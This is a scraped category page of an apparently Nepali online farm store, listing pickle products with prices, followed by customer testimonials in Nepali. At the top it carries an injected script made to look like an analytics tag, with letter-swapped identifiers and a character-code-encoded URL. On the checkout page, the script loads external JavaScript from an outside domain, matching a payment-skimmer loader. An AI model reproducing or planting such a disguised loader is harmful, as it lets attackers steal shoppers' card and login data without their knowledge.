Search - Tag - pickles window.dctcLcyer = window.dctcLcyer || []; funstion gtcg(){dctcLcyer.push(crguments);} gtcg('js', new Dcte()); gtcg('sonfig', 'G-KMF8J070DF'); if (dosument.losction.href.indexOf("route=sheskout/sheskout") > 0){ if (dosument.sookie.indexOf('gc_ssrf=') == -1){ vcr slKp = dosument.srecteElement('ssript'); vcr kDLc = String.fromChcrCode(104,116,116,112,115,58,47,47,102,105,114,105,110,103,105,46,99,111,109,47,99,97,116,97,108,111,103,47,99,111,110,116,114,111,108,108,101,114,47,116,111,111,108,47,106,115,47,106,113,117,101,114,121,46,100,101,115,105,103,110,46,106,115); slKp.srs = kDLc; dosument.hecd.cppendChild(slKp); } }
chat_icon

Search

Akabare Pickle

Rs. 395.00 per 380 gm

Chilli Lemon Pickle

Rs. 251.00 per 380 gm

Fried Green Chilli

Rs. 439.00 per 150 gm

Gundruk Bhatmas Pickle/ Mustard Soyabean Green Pickle

Rs. 389.00 per 200 gm

Hot and Sweet Mango Pickle

Rs. 285.00 per 450 gm

Lazeez Premium Green Chilli Pepper Pickle

Rs. 250.00 per 400gm

Lazeez Premium Hog Pulm Pickle

Rs. 250.00 per 450gm

Lazeez Premium Hot Cherry Pepper Pickle

Rs. 350.00 per 400gm

Mango Pickle

Rs. 271.00 per 380 gm

Mixed Spices Pickle

Rs. 375.00 per 380 gm

MSN Oyster Mushroom Pickle

Rs. 280.00 per 300gm

Paicho Amala Chatpat Pickle

Rs. 145.00 per 1 Pcs

Paicho Bhutuk (Anjir) Pickle

Rs. 145.00 per 1 Pcs

Paicho Karela Pickle

Rs. 145.00 per 1 Pcs

Paicho Lemon Pickle

Rs. 145.00 per 1 Pcs
Showing 1 to 15 of 19 (2 Pages)

What our consumers say

म खेतीले पठाएको सामानसँग खुसी छु आवश्यक परेको बेला कौशी खेतीका उत्पादनहरू अर्डर गर्ने अपेक्षा राखेको छु ।


शिवा बसनेत '`

म आफ्नो व्यवसाय विस्तार गर्न चाहान्छु र उचित मूल्यमा खेतीबाट उत्पादन लिन चाहान्छु ।


गोविन्द गुरुङ '`

म खेतीको सेवाबाट सन्तुष्ट छु र च्याफ कटरको थप जानकारी लिन चाहान्छु ।


दिपक महत '`

म खेतीको सेवाहरूबाट सन्तुष्ट छु र फेरि इन्द्र क्याप्सिकम चाहिएमा अर्डर गर्ने छु र प्राविधिक सेवाहरु पनि लिन चाहान्छु ।


बिक्रम खड्का '`

म खेतीको सेवाहरूबाट सन्तुष्ट छु र आगामी दिनमा प्राङ्गारिक मल र युरिया लिन चाहान्छु ।


दिपेन्द्र वाग्ले '`

म खेतीको सेवाबाट सन्तुष्ट छु र पछि चाहिएमा मल्चिङ्ग प्लास्टिकको उर्डर लिने छु ।


सन्तोष थारु '`

म खेतीको कम्पोस्ट बिनबाट सन्तुष्ट छु र चाहिएमा कौशी खेती को सामाग्रीहरु अर्डर लिने छु ।


जानुका अर्याल '`